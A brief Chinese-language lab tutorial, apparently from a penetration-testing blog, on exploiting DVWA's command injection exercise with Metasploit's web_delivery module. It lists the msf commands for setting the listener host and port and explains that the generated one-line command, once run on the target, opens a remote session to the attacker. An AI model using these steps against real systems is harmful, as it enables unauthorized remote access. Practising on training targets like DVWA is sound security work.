一、访问web站点,寻找漏洞
示例是在DVWA上的Command injection部分在low级别下进行的
当受害者主机存在比如命令注入、远程命令执行等问题时,攻击者可以利用web_delivery生成的一条命令建立连接。web_delivery支持php/python/powershell多种脚本。
进入msf,search web_delivery,选择
use exploit/multi/script/web_delivery
其默认脚本语言是python,如果要更换脚本语言可以show targets查看可以更换的语言的代号
set lhost = Your IP Address
set lport = Your Port
运行以后它会生成一条指令,只要目标机器运行这条指令我们就能建立session